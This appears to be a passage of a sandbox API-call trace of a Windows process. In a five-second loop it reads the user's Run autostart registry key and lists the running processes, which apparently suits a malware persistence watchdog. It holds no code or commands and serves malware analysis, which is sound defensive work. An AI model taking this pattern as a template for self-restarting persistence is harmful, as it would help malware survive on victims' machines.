[0180.661] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.661] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.661] NtClose (Handle=0x274) returned 0x0 [0180.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.674] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.676] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.677] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.677] NtClose (Handle=0x274) returned 0x0 [0180.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.692] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.694] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.694] NtClose (Handle=0x274) returned 0x0 [0180.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.706] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.707] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.707] NtClose (Handle=0x274) returned 0x0 [0180.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.721] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.722] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.722] NtClose (Handle=0x274) returned 0x0 [0180.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.733] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.734] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.734] NtClose (Handle=0x274) returned 0x0 [0180.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.745] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.746] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.746] NtClose (Handle=0x274) returned 0x0 [0180.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.771] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.774] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.774] NtClose (Handle=0x274) returned 0x0 [0180.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.786] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.790] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.791] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.791] NtClose (Handle=0x274) returned 0x0 [0180.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.804] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.805] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.805] NtClose (Handle=0x274) returned 0x0 [0180.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.824] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.826] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.826] NtClose (Handle=0x274) returned 0x0 [0180.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.855] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.856] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.856] NtClose (Handle=0x274) returned 0x0 [0180.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.868] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.870] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.870] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.870] NtClose (Handle=0x274) returned 0x0 [0180.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.882] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.889] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.890] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.890] NtClose (Handle=0x274) returned 0x0 [0180.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 